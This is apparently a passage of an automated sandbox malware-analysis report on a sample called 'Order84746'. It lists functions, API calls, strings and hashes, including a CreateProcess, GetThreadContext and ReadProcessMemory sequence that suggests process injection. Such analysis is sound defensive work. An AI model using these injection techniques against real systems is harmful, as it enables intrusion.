                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: NamePath$FullLong_memset
                          • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$X$au3
                          • API String ID: 3051022977-1954568251
                          • Opcode ID: 0842516d41086dd401250cfb5f772334fdcad6557415f407beaf90ed5b6dbada
                          • Instruction ID: f001f19e4b427c765377c71558465f982cd02ec4c76ce9508c812f873ca0a104
                          • Opcode Fuzzy Hash: 0842516d41086dd401250cfb5f772334fdcad6557415f407beaf90ed5b6dbada
                          • Instruction Fuzzy Hash: 0B219671A10298AFCF11DF99C8457DE7BFCEF5A304F008059E405E7241DBB49A898F66
                          Function 008E4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008E39FE,?,00000001), ref: 008E41DB
                          • _free.LIBCMT ref: 009536B7
                          • _free.LIBCMT ref: 009536FE
                            • Part of subcall function 008EC833: __wsplitpath.LIBCMT ref: 008EC93E
                            • Part of subcall function 008EC833: _wcscpy.LIBCMT ref: 008EC953
                            • Part of subcall function 008EC833: _wcscat.LIBCMT ref: 008EC968
                            • Part of subcall function 008EC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 008EC978
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                          • API String ID: 805182592-1757145024
                          • Opcode ID: fbd3f5b9f40d8cd4dd9576c6f6aa2192ed64ec5e55ddd1c89f2bf75fdaf1d503
                          • Instruction ID: 7574cd2012f8152ce6d0583350ae9d64b641624812f9d8345f969d8d13da020c
                          • Opcode Fuzzy Hash: fbd3f5b9f40d8cd4dd9576c6f6aa2192ed64ec5e55ddd1c89f2bf75fdaf1d503
                          • Instruction Fuzzy Hash: 7891A471910259AFCF04EFAACC929EDB7B4FF49350F108429F81AEB291DB749A05CB51
                          Function 008E4A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009A1148,?,008E61FF,?,00000000,00000001,00000000), ref: 008E5392
                            • Part of subcall function 008E49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 008E4A1D
                          • _wcscat.LIBCMT ref: 00952D80
                          • _wcscat.LIBCMT ref: 00952DB5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _wcscat$FileModuleNameOpen
                          • String ID: \$\Include\
                          • API String ID: 3592542968-2640467822
                          • Opcode ID: 459db0d233ee36e4f7af3d3e10e142f02b5f2896733378a43fdde9b51e32a240
                          • Instruction ID: b583d294cb5389dcec91139113876141f72cccc66fbec997e2a7c3499f28be5c
                          • Opcode Fuzzy Hash: 459db0d233ee36e4f7af3d3e10e142f02b5f2896733378a43fdde9b51e32a240
                          • Instruction Fuzzy Hash: 8D51517641C3809FC714EF5ED9819AAB7F8FE9B300B50452EF649C32A1EB709508DB92
                          Function 009034AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                          Download Yara Rule
                          APIs
                          • __getstream.LIBCMT ref: 009034FE
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00903539
                          • __wopenfile.LIBCMT ref: 00903549
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                          • String ID: <G
                          • API String ID: 1820251861-2138716496
                          • Opcode ID: 41a20963b1677bbb1e0dd68ad68d600d16d5296166886ac446e14d0c0c897bc4
                          • Instruction ID: 3d30eff260b3b6b384b42824011934260de8fcdaae515659d6f75bc7f998945f
                          • Opcode Fuzzy Hash: 41a20963b1677bbb1e0dd68ad68d600d16d5296166886ac446e14d0c0c897bc4
                          • Instruction Fuzzy Hash: FC11E770E002169EDB51BFB58C4276E76ACAF85360B14CC25F819CB2D1EB34CA1197A1
                          Function 008FD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                          Download Yara Rule
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008FD28B,SwapMouseButtons,00000004,?), ref: 008FD2BC
                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008FD28B,SwapMouseButtons,00000004,?,?,?,?,008FC865), ref: 008FD2DD
                          • RegCloseKey.KERNELBASE(00000000,?,?,008FD28B,SwapMouseButtons,00000004,?,?,?,?,008FC865), ref: 008FD2FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          • Opcode ID: ee16b165111a907705a689f5fcded998b560392ff71172db37b1ac8827c3dab2
                          • Instruction ID: 0765705631d623a59b6a26cac71b2fa720cf8e159e50cef493d2559491303dac
                          • Opcode Fuzzy Hash: ee16b165111a907705a689f5fcded998b560392ff71172db37b1ac8827c3dab2
                          • Instruction Fuzzy Hash: BA115775A1520CBFDB218FA8CC84EBE7BB9EF05744B004429EA01D7220E671AE40AB60
                          Function 011D9ED8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 011DA693
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011DA729
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011DA74B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                          • Instruction ID: 9a3cf4600a132f92f0035c71e3036b443c7ea5eb5fb839bf3746a4d721d5c91d
                          • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                          • Instruction Fuzzy Hash: 3C620F30A14658DBEB28CFA4D850BDEB771EF58300F1091A9D10DEB390E7759E81CB5A
                          Function 0090365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                          • String ID:
                          • API String ID: 3877424927-0
                          • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                          • Instruction ID: 61eff339972ba6ea1851ddd6bc429a1ce6648d33b62473e603b6c64a6eef49d9
                          • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                          • Instruction Fuzzy Hash: 2851A2B1A00706EFDB288FA9C88566E77ADAF41320F24CB29F825962D0D7759F509B50
                          Function 0092C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E4517: _fseek.LIBCMT ref: 008E452F
                            • Part of subcall function 0092C56D: _wcscmp.LIBCMT ref: 0092C65D
                            • Part of subcall function 0092C56D: _wcscmp.LIBCMT ref: 0092C670
                          • _free.LIBCMT ref: 0092C4DD
                          • _free.LIBCMT ref: 0092C4E4
                          • _free.LIBCMT ref: 0092C54F
                            • Part of subcall function 00901C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00907A85), ref: 00901CB1
                            • Part of subcall function 00901C9D: GetLastError.KERNEL32(00000000,?,00907A85), ref: 00901CC3
                          • _free.LIBCMT ref: 0092C557
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                          • String ID:
                          • API String ID: 1552873950-0
                          • Opcode ID: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                          • Instruction ID: 348b3c555af06f3b967ec6366d8e6970d745308ec8cca1eb617ac1dbb489238d
                          • Opcode Fuzzy Hash: 0c4af10440446b1fe8382cae8d32a76f34f7d3e1743b3aef6b58de3d60be7303
                          • Instruction Fuzzy Hash: 31516FB1904228AFDB149F68DC81BADBBB9FF48304F10049EF25DE7291DB715A808F59
                          Function 008FF4EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0090395C: __FF_MSGBANNER.LIBCMT ref: 00903973
                            • Part of subcall function 0090395C: __NMSG_WRITE.LIBCMT ref: 0090397A
                            • Part of subcall function 0090395C: RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001), ref: 0090399F
                          • std::exception::exception.LIBCMT ref: 008FF51E
                          • __CxxThrowException@8.LIBCMT ref: 008FF533
                            • Part of subcall function 00906805: RaiseException.KERNEL32(?,?,0000000E,00996A30,?,?,?,008FF538,0000000E,00996A30,?,00000001), ref: 00906856
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                          • String ID: bad allocation
                          • API String ID: 3902256705-2104205924
                          • Opcode ID: e650e5adb5355cabef126d44c60451324af09a8d16001b131b166f53a920abdb
                          • Instruction ID: d11b0554e947f0cca38067139e5e16859313dad81289de4f56cb1be06528218e
                          • Opcode Fuzzy Hash: e650e5adb5355cabef126d44c60451324af09a8d16001b131b166f53a920abdb
                          • Instruction Fuzzy Hash: F7F0A43150421EABDB14BFACD801AEE77ECAF44358F64402AFB14D21C2DBB0964096A5
                          Function 0092C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                          Download Yara Rule
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?), ref: 0092C72F
                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0092C746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Temp$FileNamePath
                          • String ID: aut
                          • API String ID: 3285503233-3010740371
                          • Opcode ID: 3941b89575cfeefbd7a7c3cbda275d0e4b84e5483f1fad3c50fe7703954d33ae
                          • Instruction ID: fff21bc693aa4de9d2e4cb9d6d2ccf57dbcdeceaea31bca6b3ded69dfdff2fb4
                          • Opcode Fuzzy Hash: 3941b89575cfeefbd7a7c3cbda275d0e4b84e5483f1fad3c50fe7703954d33ae
                          • Instruction Fuzzy Hash: 15D05E71A0430EABDB10AB90DC0EF8A776C9B04708F0001A0B660E50B1DAF1E6998B54
                          Function 0093F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d899b761c16cb2a3bfa4843357416586389ca993feca1e733d6b874a7a16e76e
                          • Instruction ID: 71098bc7be6b83cc10f77edfed7889c43798bab27ddd7d4d1cd16ed5d6fe5433
                          • Opcode Fuzzy Hash: d899b761c16cb2a3bfa4843357416586389ca993feca1e733d6b874a7a16e76e
                          • Instruction Fuzzy Hash: ECF16971A083019FCB10DF28C595B6AB7E5FF89314F10892EF9999B292D774E905CF82
                          Function 008E4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 008E5022
                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E50CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: IconNotifyShell__memset
                          • String ID:
                          • API String ID: 928536360-0
                          • Opcode ID: 189ed7939c1b5631f6c7b863a85e3a1f36e86adc21c4d1a6b043f0df929ce94a
                          • Instruction ID: 3de318af8bd773402686f6d3b4991dcef6828b81ebd9e34fd656fa76f10802d7
                          • Opcode Fuzzy Hash: 189ed7939c1b5631f6c7b863a85e3a1f36e86adc21c4d1a6b043f0df929ce94a
                          • Instruction Fuzzy Hash: 7431A2B0608B51CFD721DF25D84569BBBE8FF4A309F00092EF69AC3251E771A944CB92
                          Function 0090395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __FF_MSGBANNER.LIBCMT ref: 00903973
                            • Part of subcall function 009081C2: __NMSG_WRITE.LIBCMT ref: 009081E9
                            • Part of subcall function 009081C2: __NMSG_WRITE.LIBCMT ref: 009081F3
                          • __NMSG_WRITE.LIBCMT ref: 0090397A
                            • Part of subcall function 0090821F: GetModuleFileNameW.KERNEL32(00000000,009A0312,00000104,00000000,00000001,00000000), ref: 009082B1
                            • Part of subcall function 0090821F: ___crtMessageBoxW.LIBCMT ref: 0090835F
                            • Part of subcall function 00901145: ___crtCorExitProcess.LIBCMT ref: 0090114B
                            • Part of subcall function 00901145: ExitProcess.KERNEL32 ref: 00901154
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          • RtlAllocateHeap.NTDLL(00FD0000,00000000,00000001), ref: 0090399F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                          • String ID:
                          • API String ID: 1372826849-0
                          • Opcode ID: e0c8e15e11659e3ee38faed28ee819a13dca6fa00734813d730fae5b4847122c
                          • Instruction ID: d08a512e7e3e9ede28a319d9f7f298552274c54d119ab229db21d3ac6e32f1a0
                          • Opcode Fuzzy Hash: e0c8e15e11659e3ee38faed28ee819a13dca6fa00734813d730fae5b4847122c
                          • Instruction Fuzzy Hash: 3901F531359211DEE6213B78EC42B2A738C9FC2760F21842AF5619B2D2DFF49D0086A0
                          Function 0092C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0092C385,?,?,?,?,?,00000004), ref: 0092C6F2
                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0092C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0092C708
                          • CloseHandle.KERNEL32(00000000,?,0092C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0092C70F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: File$CloseCreateHandleTime
                          • String ID:
                          • API String ID: 3397143404-0
                          • Opcode ID: c0a9cb76550b3c865894b4e09d6768d2e9ddae93895b8da972751c695c2fbbf4
                          • Instruction ID: 811c4dd10c1697d890526484b5cf801a99ccc63925ad6c94b25692c86ac29ca1
                          • Opcode Fuzzy Hash: c0a9cb76550b3c865894b4e09d6768d2e9ddae93895b8da972751c695c2fbbf4
                          • Instruction Fuzzy Hash: 75E08632645224B7D7211B54AC09FCE7B18AB05760F104114FB24690E097F125119798
                          Function 0092BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                          Download Yara Rule
                          APIs
                          • _free.LIBCMT ref: 0092BB72
                            • Part of subcall function 00901C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00907A85), ref: 00901CB1
                            • Part of subcall function 00901C9D: GetLastError.KERNEL32(00000000,?,00907A85), ref: 00901CC3
                          • _free.LIBCMT ref: 0092BB83
                          • _free.LIBCMT ref: 0092BB95
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 776569668-0
                          • Opcode ID: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                          • Instruction ID: 05310fe9fefef2d54727fa55eb4cceeb23340ebe7c7e7f290e8680906898ef6e
